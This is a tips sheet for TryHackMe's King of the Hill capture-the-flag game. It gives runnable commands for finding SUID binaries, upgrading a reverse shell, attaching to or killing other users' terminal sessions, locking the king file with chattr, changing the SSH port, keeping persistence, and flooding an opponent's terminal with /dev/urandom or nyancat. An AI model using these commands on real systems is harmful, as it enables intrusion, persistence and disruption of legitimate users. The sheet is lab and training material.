• you can use find to search for permissions with root

find / -type f \( -perm -4000 -o -perm -2000 \) -print

• you can use this to make the file immutable and therefore keep your name in this file.

chattr +i /root/king.txt

# User privilege specification
root ALL=(ALL=ALL) ALL
teste ALL=(root) SETENV:NOPASSWD: /usr/bin/git *, /usr/bin/chattr
test1 ALL=(root) NOPASSWD: /bin/su test1, /usr/bin/chattr

• here you can see that user teste and teste1 has root permission on the git and su binary, to fix this just remove everything from the teste and teste1 there

root ALL=(ALL=ALL) ALL

• and it will be like that, so there will be no way to climb privilege by su and git

• you can use find to look for flags

find / -name flag.txt 2>/dev/null
find / -name user.txt 2>/dev/null
find / -name .flag 2>/dev/null
find / -name flag 2>/dev/null
find / -name root.txt 2>/dev/null

• tweaking your shell, if you get a reverse shell and you ctrl + c and your shell closes/stops, this will help you and you can edit, give ctrl + c at will

python3 -c 'import pty; pty.spawn("/bin/sh")'
export TERM=xterm
Ctrl + z
stty raw -echo;fg

• you can use the following command to break into the shell of other logged in users

script -f /dev/pts/1

• for you to know which pts (pseudo slave terminal) the user is connected, just use the following command in the terminal: w , then just see which pts the user is and use the command

• you can use the following commands to see who is logged into ssh/system

w
who
ps aux | grep pts

• to kill someone's session just use the following command

pkill -9 -t pts/1

• as explained in some examples above, just put the pts of the user you want to remove from the machine

• to change a user's password just use the following command

passwd [UserName]

• you can change ssh keys

nano /etc/ssh/sshd_config

Include /etc/ssh/sshd_config.d/*.conf

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

• by default the SSH port is port 22, but you can change this port for example

Include /etc/ssh/sshd_config.d/*.conf

Port 55999
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

service sshd restart

• and ready after restarting the SSH service the SSH port will be at 55999

git clone https://github.com/klange/nyancat

cd nyancat/src

make

python -m SimpleHTTPServer 80 # on your local machine

wget http://yourip/nyancat # on the KOTH machine

chmod +x nyancat

./nyancat > /dev/pts/# < here where is the # you will place the enemy PTS where I explained it here in this koth tryhackme tricks.

cat /dev/urandom > /dev/pts/#

• Look for common ways to fix a box, for example: changing ssh keys, changing passwords, look for running processes or even in cronjobs

• Always set your persistence so that even if someone kicks you out, you have multiple ways to get back.

• So start fixing things in the box. Fix security issues, not legitimate services. For example, disabling ssh is NOT allowed unless it is an intentionally broken ssh installation.

for privilege escalation.

this will help you with reverse shell

this will help you with ciphers, hashes, etc.

Don't do anything wrong on the koth machines, please respect all the rules for everyone to have a great experience and a great game

https://docs.tryhackme.com/docs/koth/king-of-the-hill